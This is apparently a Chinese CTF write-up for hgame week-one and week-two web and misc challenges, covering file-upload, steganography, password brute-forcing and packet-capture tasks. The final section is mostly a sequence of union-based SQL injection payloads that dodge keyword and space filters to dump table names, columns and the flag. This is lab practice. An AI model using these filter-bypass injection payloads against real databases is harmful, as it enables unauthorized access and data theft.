WEB & MISC 方向题解
第一周:
WEB-Classic Childhood Game
兔兔最近迷上了一个纯前端实现的网页小游戏,但是好像有点难玩,快帮兔兔通关游戏!
前端制作的游戏,通关,读取源码,找flag,有些是直接写在文本中,还有以弹窗形式弹出,字符可能加密需要找到并翻译,
或者找到游戏通关条件,直接修改,具体看题
找到通关界面,输入mota函数或者翻译编码随意
WEB-文件上传
没什么过滤,大小写直接得到flag
WEB-Guess Who I Am
刚加入Vidar的兔兔还认不清协会成员诶,学长要求的答对100次问题可太难了,你能帮兔兔写个脚本答题吗?
爬虫写个脚本传源码那里github的答案,或者一百个……直接填也可以(下图不是我写的,找学姐借 )
MISC SIGNIN
BASE64MISC eggman
csdn找找脚本,直接修复图片即可(CRC校验)
MISC 海报
LSB隐写发现端倪
给了一半flag 另一半说用steghide加密,六位数字密码,给了网址,wav隐写
下载这个……搜谷歌云盘如何下载或者……能下载直接下也行
六位密码可以爆破,也可以试试123456 或者114514什么的
拿到另一半flag结束
MISC Where am I
兔兔回家之前去了一个神秘的地方,并拍了张照上传到网盘,你知道他去了哪里吗?
wireshark中发现是一个上传文件的请求,搜索追踪post tcp流得到一串编码开头RAR 是压缩文件,
把他放到010编辑器里面,
伪加密把24改成80
解压缩看属性得到GPS
WEB sql记录
第二周:
简单测试,数字型注入
可以双写绕过 //当空格 /*//*/
union等可大小写双写绕过
1//**//oRder//**//By//**//1,2,3 直到4无显示,则三列
接下来联合查询 找回显位
1//**//Union//**//selecT//**//1,2,3
0//**//Union//**//selecT//**//1,2,3
发现23位为回显位
查库名字
0//**//Union//**//selecT//**//1,dataBase(),3
库名se4rch 3
0//**//Union//**//selecT//**//1,(seLect//**//groUp_coNcat(taBle_Name)//**//fRom//**//inFOrmatIon_schEma.taBleS//**//whERe//**//taBle_sChema=’se4rch 3’),3
等号被过滤,因此,换用下面的
0//**//uniunionon//**//selselectect//**//1,(selselectect//**//grOup_concAt(taBle_Name)//**//frfromom//**//infoorrmation_scHema.tables//**//whewherere//**//table_schema//**//like//**//“se4rch”),3
表名
5ecret15here,L1st,user1nf0 3
应该是第一个了
0//**//unION//**//sELECT//**//1,(seLECt//**//group_coNcat(column_name)//**//fROm//**//infORmation_schema.columns//**//whERe//**//table_name//**//like//**//“5ecret15here”),3
f14gggg1shere 3
0//**//uniON//**//SELECT//**//1,(SELECT//**//f14gggg1shere//**//frOM//**//5ecret15here),3
hgame{4_M4n_WH0_Kn0ws_We4k-P4ssW0rd_And_SQL!} 3